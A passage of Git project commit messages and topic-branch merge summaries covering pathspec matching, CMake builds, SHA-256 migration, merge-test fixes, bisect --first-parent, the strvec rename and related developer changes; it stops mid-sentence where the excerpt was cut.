Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Helped-by: Philip Oakley <philipoakley@iee.email>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Nonbare repositories are special directories. Unlike normal directories
that we might recurse into to list the files they contain, nonbare
repositories must themselves match and then we always report only on the
nonbare repository directory itself and not on any of its contents.
Separately, when traversing directories to try to find untracked or
excluded files, we often think in terms of paths either matching the
specified pathspec, or not matching them. However, there is a special
value that do_match_pathspec() uses named
MATCHED_RECURSIVELY_LEADING_PATHSPEC which means "this directory does
not match any pathspec BUT it is possible a file or directory underneath
it does." That special value prevents us from prematurely thinking that
some directory and everything under it is irrelevant, but also allows us
to differentiate from "this is a match".
The combination of these two special cases was previously uncovered.
Add a test to the testsuite to cover it, and make sure that we return a
nonbare repository as a non-match if the best match it got was
MATCHED_RECURSIVELY_LEADING_PATHSPEC.
Reported-by: christian w <usebees@gmail.com>
Simplified-testcase-and-bisection-by: Kyle Meyer <kyle@kyleam.com>
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is no such flag as --o; it is either --others or -o.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The only caller of reschedule_last_action was removed by ef64bb328d
(rebase: strip unused code in git-rebase--preserve-merges.sh,
2018-05-28); remove this unused shell function as well.
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
CMake support to build with MSVC for Windows bypassing the Makefile.
* ss/cmake-build:
ci: modification of main.yml to use cmake for vs-build job
cmake: support for building git on windows with msvc and clang.
cmake: support for building git on windows with mingw
cmake: support for testing git when building out of the source tree
cmake: support for testing git with ctest
cmake: installation support for git
cmake: generate the shell/perl/python scripts and templates, translations
Introduce CMake support for configuring Git
The component to respond to "git fetch" request is made more
configurable to selectively allow or reject object filtering
specification used for partial cloning.
* tb/upload-pack-filters:
t5616: use test_i18ngrep for upload-pack errors
upload-pack.c: introduce 'uploadpackfilter.tree.maxDepth'
upload-pack.c: allow banning certain object filter(s)
list_objects_filter_options: introduce 'list_object_filter_config_name'
Doc cleanup around "worktree".
* es/worktree-doc-cleanups:
git-worktree.txt: link to man pages when citing other Git commands
git-worktree.txt: make start of new sentence more obvious
git-worktree.txt: fix minor grammatical issues
git-worktree.txt: consistently use term "working tree"
git-worktree.txt: employ fixed-width typeface consistently
The final leg of SHA-256 transition.
* bc/sha-256-part-3: (39 commits)
t: remove test_oid_init in tests
docs: add documentation for extensions.objectFormat
ci: run tests with SHA-256
t: make SHA1 prerequisite depend on default hash
t: allow testing different hash algorithms via environment
t: add test_oid option to select hash algorithm
repository: enable SHA-256 support by default
setup: add support for reading extensions.objectformat
bundle: add new version for use with SHA-256
builtin/verify-pack: implement an --object-format option
http-fetch: set up git directory before parsing pack hashes
t0410: mark test with SHA1 prerequisite
t5308: make test work with SHA-256
t9700: make hash size independent
t9500: ensure that algorithm info is preserved in config
t9350: make hash size independent
t9301: make hash size independent
t9300: use $ZERO_OID instead of hard-coded object ID
t9300: abstract away SHA-1-specific constants
t8011: make hash size independent
...
--diff-merges=off is the only accepted form for now, a synonym for
--no-diff-merges.
This patch is a preparation for adding more values, as well as supporting
--diff-merges=<parent>, where <parent> is single parent number to output diff
against.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test added by e5256c82e5 (refs: fix interleaving hook calls with
reference-transaction hook, 2020-08-07) uses hard-coded sha1 object ids
in its expected output. This causes it to fail when run with
GIT_TEST_DEFAULT_HASH=sha256.
Let's make use of the oid variables we define earlier, as the rest of
the nearby tests do.
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --batch-size=<size> option of 'git multi-pack-index repack' is
intended to limit the amount of work done by the repack. In the case of
a large repository, this command should repack a number of small
pack-files but leave the large pack-files alone. Most often, the
repository has one large pack-file from a 'git clone' operation and
number of smaller pack-files from incremental 'git fetch' operations.
The issue with '--batch-size' is that it also _prevents_ the repack from
happening if the expected size of the resulting pack-file is too small.
This was intended as a way to avoid frequent churn of small pack-files,
but it has mostly caused confusion when a repository is of "medium"
size. That is, not enormous like the Windows OS repository, but also not
so small that this incremental repack isn't valuable.
The solution presented here is to collect pack-files for repack if their
expected size is smaller than the batch-size parameter until either the
total expected size exceeds the batch-size or all pack-files are
considered. If there are at least two pack-files, then these are
combined to a new pack-file whose size should not be too much larger
than the batch-size.
This new strategy should succeed in keeping the number of pack-files
small in these "medium" size repositories. The concern about churn is
likely not interesting, as the real control over that is the frequency
in which the repack command is run.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2997178ee6 (upload-pack: split check_unreachable() in two, prep for
get_reachable_list(), 2016-06-12) moved most code of has_unreachable()
into the new function do_reachable_revlist(). The latter takes care to
ignore SIGPIPE during its operations, and restores the original signal
handler before returning.
However, a sigchain_pop(SIGPIPE) call remained in the error handling
code of has_unreachable(), which does nothing because the stack is
empty after do_reachable_revlist() cleaned up after itself. Remove it.
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t6425 was very picky about the exact output message produced by a
rename/delete conflict, in a way that just scratches the surface of the
mess that was built into merge-recursive. The idea was that it would
try to find the possible combinations of different conflict types, and
when more than one was present for one path, it would try to provide a
combined message that covered all the cases.
There's a lot to unravel here...
First, there's a basic conflict type known as modify/delete, which is a
content conflict. It occurs when one side deletes a file, but the other
modifies it.
There is also a path conflict known as a rename/delete. This occurs
when one side deletes a path, and the other renames it. This is not a
content conflict, it is a path conflict. It will often occur in
combination with a content conflict, though, namely a modify/delete. As
such, these two were often combined.
Another type of conflict that can exist is a directory/file conflict.
For example, one side adds a new file at some path, and the other side
of history adds a directory at the same path. The path that was "added"
could have been put there by a rename, though. Thus, we have the
possibility of a single path being affected by a modify/delete, a
rename/delete, and a directory/file conflict.
In part, this was a natural by-product of merge-recursive's design.
Since it was doing a four way merge with the contents of the working
tree being the fourth factor it had to consider, it had working tree
handling spread all over the code. It also had directory/file conflict
handling spread everywhere through all the other types of conflicts.
And our testsuite has a huge number of directory/file conflict tests
because trying to get them right required modifying so many different
codepaths. A natural outgrowth of this kind of structure is conflict
messages that combine all the different types that the current codepath
is considering.
However, if we want to make the different conflict types orthogonal and
avoid repeating ourselves and getting very brittle code, then we need to
split the messages from these different conflict types apart. Besides,
trying to determine all possible permutations is a _royal_ mess. The
code to handle the rename/delete/directory/file conflict output is
already somewhat hard to parse, and is somewhat brittle. But if we
really wanted to go that route, then we'd have to have special handling
for the following types of combinations:
* rename/add/delete:
on side of history that didn't rename the given file, remove the file
instead and place an unrelated file in the way of the rename
* rename/rename(2to1)/mode conflict/delete/delete:
two different files, one executable and the other not, are renamed
to the same location, each side deletes the source file that the
other side renames
* rename/rename(1to2)/add/add:
file renamed differently on each side of history, with each side
placing an unrelated file in the way of the other
* rename/rename(1to2)/content conflict/file location/(D/F)/(D/F)/:
both sides modify a file in conflicting way, both rename that file
but to different paths, one side renames the directory which the
other side had renamed that file into causing it to possibly need a
transitive rename, and each side puts a directory in the way of the
other's path.
Let's back away from this path of insanity, and allow the different
types of conflicts to be handled by separate pieces of non-repeated code
by allowing the conflict messages to be split into their separate types.
(If multiple conflict types affect a single path, the conflict messages
can be printed sequentially.) Start this path with a simple change:
modify this test to be more flexible and accept the output either merge
backend (recursive or the new ort) will produce.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Much like the last commit accepted 'add/add' and 'rename/add'
interchangably, we also want to do the same for 'add/add' and
'rename/rename'. This also allows us to avoid the ambiguity in meaning
with 'rename/rename' (is it two separate files renamed to the same
location, or one file renamed on both sides but differently)?
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge-recursive treats an add/add conflict where one of the adds came
from a rename as a separate 'rename/add' type of conflict. However, if
there is not content conflict after the content merge(s), then the file
is not considered to be conflicted. That suggests the conflict type is
really just add/add. Other merge engines might choose to print messages
to the console that just refer to these as add/add conflicts; accept
both types of output.
Note: it could help to notify users if the three-way content merge of
the rename had content conflicts, because when we then go to two-way
merge THAT with the conflicting add we can get nested conflict markers.
merge-recursive, unfortunately, doesn't do that, but other merge engines
could.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
I had long since forgotten the idea behind this test and why it failed,
and took a little while to figure it out. To prevent others from having
to spend a similar time on it, add an explanation in the comments.
However, the reasoning in the explanation makes me question why I
considered it a failure at all. I'm not sure if I had a better reason
when I originally wrote it, but for now just add commentary about the
possible expectations and why it behaves the way it does right now.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This test had multiple issues causing it to fail for the wrong
reason(s):
* rename/rename(1to2) conflicts have always left the original source
path present in the working directory and index (at stage 1). Thus,
the triple rename/rename(1to2) should result in 9 unstaged files,
not 6.
* It messed up the three-way content merge for checking the results of
merging for one of the renames, accidentally turning it into a
two-way merge.
* It got the contents of the base files it was using to compare
against wrong, due to an off-by-one error, and overwrite-redirection
('>') instead of append-redirection ('>>').
* It used slightly too-long conflict markers
* It didn't include filenames in the conflict marker hunks (granted,
that was a shortcoming of the merge-recursive backend for rename/add
and rename/rename(2to1) conflicts, but since it's
test_expect_failure anyway we might as well make it expect our
preferred behavior rather than some compromise that we can't yet
reach anyway).
Fix these issues so that a merge backend which correctly handles these
kinds of nested conflicts will pass the test.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit da1e295e00 ("t604[236]: do not run setup in separate tests",
2019-10-22) removed approximately half the tests (which were setup-only
tests) in t6043 by turning them into functions that the subsequent test
would call as their first step. This ensured that any test from this
file could be run entirely independently of all the other tests in the
file. Unfortunately, the call to the new setup function was missed in
two of the test_expect_failure cases. Add them in.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Apparently I don't know how to count untracked files, and since the
tests in question were marked as test_expect_failure, no one ever
noticed it until now. Correct the count, as these tests clearly create
three untracked files ('out', 'err', and 'file_count').
(I believe this problem arose because earlier incarnations counted lines
via a pipe to 'wc -l'. Reviewers asked that it be replaced by writing
the output to a file and using test_line_count, but when the temporary
output was added to a separate file, the count of untracked files should
have increased.)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The testcase only required that the merge complete without conflict,
without specifying what the correct resolution was. Since normalization
changed this from a modify/delete to a not-modified/delete, the correct
resolution is to have the file be removed at the end. Add a check for
this resolution.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The tests for the merge machinery are spread over several places.
Collect them into t64xx for simplicity. Some notes:
t60[234]*.sh:
Merge tests started in t602*, overgrew bisect and remote tracking
tests in t6030, t6040, and t6041, and nearly overtook replace tests
in t6050. This made picking out relevant tests that I wanted to run
in a tighter loop slightly more annoying for years.
t303*.sh:
These started out as tests for the 'merge-recursive' toplevel command,
but did not restrict to that and had lots of overlap with the
underlying merge machinery.
t7405, t7613:
submodule-specific merge logic started out in submodule.c but was
moved to merge-recursive.c in commit 18cfc08866 ("submodule.c: move
submodule merging to merge-recursive.c", 2018-05-15). Since these
tests are about the logic found in the merge machinery, moving these
tests to be with the merge tests makes sense.
t7607, t7609:
Having tests spread all over the place makes it more likely that
additional tests related to a certain piece of logic grow in all those
other places. Much like t303*.sh, these two tests were about the
underlying merge machinery rather than outer levels.
Tests that were NOT moved:
t76[01]*.sh:
Other than the four tests mentioned above, the remaining tests in
t76[01]*.sh are related to non-recursive merge strategies, parameter
parsing, and other stuff associated with the highlevel builtin/merge.c
rather than the recursive merge machinery.
t3[45]*.sh:
The rebase testcases in t34*.sh also test the merge logic pretty
heavily; sometimes changes I make only trigger failures in the rebase
tests. The rebase tests are already nicely coupled together, though,
and I didn't want to mess that up. Similar comments apply for the
cherry-pick tests in t35*.sh.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In `stop_progress()`, we're careful to check that `p_progress` is
non-NULL before we dereference it, but by then we have already
dereferenced it when calling `finish_if_sparse(*p_progress)`. And, for
what it's worth, we'll go on to blindly dereference it again inside
`stop_progress_msg()`.
We could return early if we get a NULL-pointer, but let's go one step
further and BUG instead. The progress API handles NULL just fine, but
that's the NULL-ness of `*p_progress`, e.g., when running with
`--no-progress`. If `p_progress` is NULL, chances are that's a mistake.
For symmetry, let's do the same check in `stop_progress_msg()`, too.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update "git help guides" documentation organization.
* pb/guide-docs:
git.txt: add list of guides
Documentation: don't hardcode command categories twice
help: drop usage of 'common' and 'useful' for guides
command-list.txt: add missing 'gitcredentials' and 'gitremote-helpers'
All "mergy" operations that internally use the merge-recursive
machinery should honor the merge.renormalize configuration, but
many of them didn't.
* en/eol-attrs-gotchas:
checkout: support renormalization with checkout -m <paths>
merge: make merge.renormalize work for all uses of merge machinery
t6038: remove problematic test
t6038: make tests fail for the right reason
Small fixes and workarounds.
* jk/compiler-fixes-and-workarounds:
revision: avoid leak when preparing bloom filter for "/"
revision: avoid out-of-bounds read/write on empty pathspec
config: work around gcc-10 -Wstringop-overflow warning
Adjust tests in contrib/ to the recent change to fmt-merge-msg.
* es/adjust-subtree-test-for-merge-msg-update:
Revert "contrib: subtree: adjust test to change in fmt-merge-msg"
Code cleanup around "worktree" API implementation.
* es/worktree-cleanup:
worktree: retire special-case normalization of main worktree path
worktree: drop bogus and unnecessary path munging
worktree: drop unused code from get_linked_worktree()
worktree: drop pointless strbuf_release()
The argv_array API is useful for not just managing argv but any
"vector" (NULL-terminated array) of strings, and has seen adoption
to a certain degree. It has been renamed to "strvec" to reduce the
barrier to adoption.
* jk/strvec:
strvec: rename struct fields
strvec: drop argv_array compatibility layer
strvec: update documention to avoid argv_array
strvec: fix indentation in renamed calls
strvec: convert remaining callers away from argv_array name
strvec: convert more callers away from argv_array name
strvec: convert builtin/ callers away from argv_array name
quote: rename sq_dequote_to_argv_array to mention strvec
strvec: rename files from argv-array to strvec
argv-array: rename to strvec
argv-array: use size_t for count and alloc
The purpose of "git init --separate-git-dir" is to separate the
repository from the worktree. This is true even when --separate-git-dir
is used on an existing worktree, in which case, it moves the .git/
subdirectory to a new location outside the worktree.
However, an outright bare repository (such as one created by "git init
--bare"), has no worktree, so using --separate-git-dir to separate it
from its non-existent worktree is nonsensical. Therefore, make it an
error to use --separate-git-dir on a bare repository.
Implementation note: "git init" considers a repository bare if told so
explicitly via --bare or if it guesses it to be so based upon
heuristics. In the explicit --bare case, a conflict with
--separate-git-dir is easy to detect early. In the guessed case,
however, the conflict can only be detected once "bareness" is guessed,
which happens after "git init" has begun creating the repository.
Technically, we can get by with a single late check which would cover
both cases, however, erroring out early, when possible, without leaving
detritus provides a better user experience.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Under normal circumstances, if a test author misspells a filename passed
to test_cmp(), the error is quickly discovered when the test fails
unexpectedly due to test_cmp() being unable to find the file. However,
if the test is expected to fail, as with test_expect_failure(), a
misspelled filename as argument to test_cmp() will go unnoticed since
the test will indeed fail, but for the wrong reason. Make it easier for
test authors to discover such problems early by sanity-checking the
arguments to test_cmp(). To avoid penalizing all clients of test_cmp()
in the general case, only check for missing files if the comparison
fails.
While at it, make test_cmp_bin() sanity-check its arguments, as well.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When creating "new file" diffs against i-t-a index entries, diff-lib
erroneously used the mode of the cache entry rather than the mode of the
file in the worktree. This changes run_diff_files() to correctly use the
mode of the worktree file in this case.
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
apply --cached (as used by add -p) should accept creation and deletion
patches to intent-to-add paths in the index. apply --index, however,
should always fail because an intent-to-add path never matches the
worktree (by definition).
Based-on-patch-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By definition, an intent-to-add index entry can never match the
worktree, because worktrees have no concept of intent-to-add entries.
Therefore, "apply --index" should always fail on intent-to-add paths.
Because check_preimage() calls verify_index_match(), it already fails
for patches other than creation patches, which check_preimage() ignores.
This patch adds a check to check_preimage()'s rough equivalent for
creation patches, check_to_create().
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that find_bisection() accepts multiple boolean arguments, these may
be combined into a single unsigned integer in order to declutter some of
the code in bisect.c
Also, rename the existing "flags" bitfield to "commit_flags", to
explicitly differentiate it from the new "bisect_flags" bitfield.
Based-on-patch-by: Harald Nordgren <haraldnordgren@gmail.com>
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Upon seeing a merge commit when bisecting, this option may be used to
follow only the first parent.
In detecting regressions introduced through the merging of a branch, the
merge commit will be identified as introduction of the bug and its
ancestors will be ignored.
This option is particularly useful in avoiding false positives when a
merged branch contained broken or non-buildable commits, but the merge
itself was OK.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
cmd_bisect__helper() is intended as a temporary shim layer serving as an
interface for git-bisect.sh. This function and git-bisect.sh should
eventually be replaced by a C implementation, cmd_bisect(), serving as
an entrypoint for all "git bisect ..." shell commands: cmd_bisect() will
only parse the first token following "git bisect", and dispatch the
remaining args to the appropriate function ["bisect_start()",
"bisect_next()", etc.].
Thus, cmd_bisect__helper() should not be responsible for parsing flags
like --no-checkout. Instead, let the --no-checkout flag remain in the
argv array, so it may be evaluated alongside the other options already
parsed by bisect_start().
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add first_parent_only parameter to find_bisection(), removing the
barrier that prevented combining the --bisect and --first-parent flags
when using git rev-list
Based-on-patch-by: Tiago Botelho <tiagonbotelho@hotmail.com>
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Enforce consistent styling for tests on "git bisect run":
- Use "write_script" to abstract away platform-specific details.
- Favor current whitespace conventions.
- While at it, change "introduced" to "added" in the comments to make
them read better.
Helped-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to not repeatedly search for the reference-transaction hook in
case it's getting called multiple times, we use a caching mechanism to
only call `find_hook()` once. What was missed though is that the return
value of `find_hook()` actually comes from a static strbuf, which means
it will get overwritten when calling `find_hook()` again. As a result,
we may call the wrong hook with parameters of the reference-transaction
hook.
This scenario was spotted in the wild when executing a git-push(1) with
multiple references, where there are interleaving calls to both the
update and the reference-transaction hook. While initial calls to the
reference-transaction hook work as expected, it will stop working after
the next invocation of the update hook. The result is that we now start
calling the update hook with parameters and stdin of the
reference-transaction hook.
This commit fixes the issue by storing a copy of `find_hook()`'s return
value in the cache.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A Git client may produce a "remote error:" message (along with whatever
error the other side sent us) in two places:
- when we see an ERR packet
- when we're using a sideband and see sideband 3
We can't reliably translate the message the other side sent us, but we
can do so for our own prefix. However, we translate only the ERR-packet
case but not the sideband-3 case. Let's make them consistent (by marking
both for translation).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When there is no need to run a specific function on certain platforms,
we often #define an empty function to swallow its parameters and
make it into a no-op, e.g.
#define precompose_argv(c,v) /* no-op */
While this guarantees that no unneeded code is generated, it also
discards type and other checks on these parameters, e.g. a new code
written with the argv-array API (diff_args is of type "struct
argv_array" that has .argc and .argv members):
precompose_argv(diff_args.argc, diff_args.argv);
must be updated to use "struct strvec diff_args" with .nr and .v
members, like so:
precompose_argv(diff_args.nr, diff_args.v);
after the argv-array API has been updated to the strvec API.
However, the "no oop" C preprocessor macro is too aggressive to
discard what is unused, and did not catch such a call that was left
unconverted.
Using a "static inline" function whose body is a no-op should still
result in the same binary with decent compilers yet catch such a
reference to a missing field or passing a value of a wrong type.
While at it, I notice that precompute_str() has never been used
anywhere in the code, since it was introduced at 76759c7d (git on
Mac OS and precomposed unicode, 2012-07-08). Instead of turning it
into a static inline, just remove it.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Drop whitespace in the value of `$test_description` and in a test body
and use `test_write_lines`.
Stop defining `$u` with a trailing space just so that we can tuck it in
like `git foo $u$more...` and get minimal whitespace in the command:
`git foo $u $more...` is more readable at the "cost" of an empty `$u`
yielding `git foo something...`.
Finally, avoid using single quotes within the test scripts to repeatedly
close and reopen the quotes that wrap the test scripts (see the previous
commit). This "unnecessary" quoting does mean that the verbose test
output shows the interpolated values, i.e., the shell code we're
running. But the downside is that the source of the script does *not*
show the shell code we're eventually executing, leaving the reader to
reason about what we really do and whether there are any quoting issues.
(There aren't.)
Where we run through loops to generate several "identical but different"
tests, the test message contains the interpolated variables we're
looping on, meaning one can always identify exactly which instance has
failed, even if the verbose test output shows the exact same test body
several times.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the test scripts, the recommended style is, e.g.:
test_expect_success 'name' '
do-something somehow &&
do-some-more testing
'
When using this style, any single quote in the multi-line test section
is actually closing the lone single quotes that surround it.
It can be a non-issue in practice:
test_expect_success 'sed a little' '
sed -e 's/hi/lo/' in >out # "ok": no whitespace in s/hi/lo/
'
Or it can be a bug in the test, e.g., because variable interpolation
happens before the test even begins executing:
v=abc
test_expect_success 'variable interpolation' '
v=def &&
echo '"$v"' # abc
'
Change several such in-test single quotes to use double quotes instead
or, in a few cases, drop them altogether. These were identified using
some crude grepping. We're not fixing any test bugs here, but we're
hopefully making these tests slightly easier to grok and to maintain.
There are legitimate use cases for closing a quote and opening a new
one, e.g., both '\'' and '"'"' can be used to produce a literal single
quote. I'm not touching any of those here.
In t9401, tuck the redirecting ">" to the filename while we're touching
those lines.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
blame/annotate have supported --first-parent since commit 95a4fb0eac
("blame: handle --first-parent"). This adds a blurb on that option to
the documentation.
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
diff-files recently changed to treat changes to paths marked "intent to
add" in the index as new file diffs rather than diffs from the empty
blob. However, apply refuses to apply new file diffs on top of existing
index entries, except in the case of renames. This causes "git add -p",
which uses apply, to fail when attempting to stage hunks from a file
when intent to add has been recorded.
This changes the logic in check_to_create() which checks if an entry
already exists in an index in two ways: first, we only search for an
index entry at all if ok_if_exists is false; second, we check for the
CE_INTENT_TO_ADD flag on any index entries we find and allow the apply
to proceed if it is set.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a call to has_object_file(), which lazily fetches missing
objects in a partial clone, when the object is known to not be
a promisor object. Change that call to has_object(), which does not do
any lazy fetching.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The options --missing=allow-{any,promisor} were introduced in caf3827e2f
("rev-list: add list-objects filtering support", 2017-11-22) with the
following note in the commit message:
This patch introduces handling of missing objects to help
debugging and development of the "partial clone" mechanism,
and once the mechanism is implemented, for a power user to
perform operations that are missing-object aware without
incurring the cost of checking if a missing link is expected.
The idea that these options are missing-object aware (and thus do not
need to lazily fetch objects, unlike unaware commands that assume that
all objects are present) are assumed in later commits such as 07ef3c6604
("fetch test: use more robust test for filtered objects", 2020-01-15).
However, the current implementations of these options use
has_object_file(), which indeed lazily fetches missing objects. Teach
these implementations not to do so. Also, update the documentation of
these options to be clearer.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When applying a binary patch, as an optimization, "apply" checks if the
postimage is already present. During this fetch, it is perfectly
expected for the postimage not to be present, so there is no need to
lazy-fetch missing objects. Teach "apply" not to lazy-fetch in this
case.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There have been a few bugs wherein Git fetches missing objects whenever
the existence of an object is checked, even though it does not need to
perform such a fetch. To resolve these bugs, we could look at all the
places that has_object_file() (or a similar function) is used. As a
first step, introduce a new function has_object() that checks for the
existence of an object, with a default behavior of not fetching if the
object is missing and the repository is a partial clone. As we verify
each has_object_file() (or similar) usage, we can replace it with
has_object(), and we will know that we are done when we can delete
has_object_file() (and the other similar functions).
Also, the new function has_object() has more appropriate defaults:
besides not fetching, it also does not recheck packed storage.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The change in 6e9c4d408d ("git-cvsexportcommit: port to SHA-256",
2020-06-22) added the use of a temporary directory for the index.
However, the form we used doesn't work in versions of Perl before
5.10.1. For example, version 5.10.0 contains a version of File::Temp
from 2007 that doesn't contain "newdir".
In order to make the code work with 5.8.8, which we support, let's
change to use the static method "tempdir" with the argument "CLEANUP",
which provides the same behavior.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The tests added to t5616 in 6dd3456a8c (upload-pack.c: allow banning
certain object filter(s), 2020-08-03) can fail racily, but only with
GETTEXT_POISON enabled.
The tests in question look something like this:
test_must_fail ok=sigpipe git clone --filter=blob:none ... 2>err &&
grep "filter blob:none not supported' err
The remote upload-pack process writes that error message both as an ERR
packet, but also via a die() message. In theory we should see the
message twice in the "err" file. The client relays the message from the
packet to its stderr (with a "remote error:" prefix), and because this
is a local-system clone, upload-pack's stderr goes to the same place.
But because clone may be writing to the pipe when upload-pack calls
die(), it may get SIGPIPE and fail to relay the message. That's why we
need our "ok=sigpipe" trick. But our grep should still work reliably in
that case. Either:
- we got SIGPIPE on the client, which means upload-pack completed its
die(), and we'll see that version of the message.
- the client didn't get SIGPIPE, and so it successfully relays the
message.
In theory we'd see both copies of the message in the second case. But
now always! As soon as the client sees ERR, it exits and we run grep.
But we have no guarantee that the upload-pack process has exited at this
point, or even written its die() message. We might only see the client
version of the message.
Normally that's OK. We only need to see one or the other to pass the
test. But now consider GETTEXT_POISON. upload-pack doesn't translate the
die() message nor the ERR packet. But once the client receives it, it
calls:
die(_("remote error: %s"), buffer + 4);
That message _is_ marked for translation. Normally we'd just replace the
"remote error:" portion of it, but in GETTEXT_POISON mode, we replace
the whole thing with "# GETTEXT POISON #" and don't include the "%s"
part at all. So the whole text from the ERR packet is dropped, and so we
may racily see a test failure if upload-pack's die() call wasn't yet
written.
We can fix it by using test_i18ngrep, which just makes this grep a noop
in the poison mode.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Not all man5/man7 guides are mentioned in the 'git(1)' documentation,
which makes the missing ones somewhat hard to find.
Add a list of the guides to git(1) by leveraging the existing
`Documentation/cmd-list.perl` script to generate a file `cmds-guide.txt`
which gets included in git.txt.
Also, do not hard-code the manual section '1'. Instead, use a regex so
that the manual section is discovered from the first line of each
`git*.txt` file.
This addition was hinted at in 1b81d8cb19 (help: use command-list.txt
for the source of guides, 2018-05-20).
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of hard-coding the list of command categories in both
`Documentation/Makefile` and `Documentation/cmd-list.perl`, make the
Makefile the authoritative source and tweak `cmd-list.perl` so that it
receives the list of command categories as argument.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since 1b81d8cb19 (help: use command-list.txt for the source of guides,
2018-05-20), all man5/man7 guides listed in command-list.txt appear in
the output of 'git help -g'.
However, 'git help -g' still prefixes this list with "The common Git
guides are:", which makes one wonder if there are others!
In the same spirit, the man page for 'git help' describes the '--guides'
option as listing 'useful' guides, which is not false per se but can
also be taken to mean that there are other guides that exist but are not
useful.
Instead of 'common' and 'useful', use 'Git concept guides' in both
places. To keep the code in line with this change, rename
help.c::list_common_guides_help to list_guides_help.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The guides 'gitcredentials' and 'gitremote-helpers' do not currently
appear in command-list.txt.
'gitcredentials' was forgotten back when guides were added to
command-list.txt in 1b81d8cb19 (help: use command-list.txt for the
source of guides, 2018-05-20).
'gitremote-helpers' was moved to section 7 in 439cc74632 (docs: move
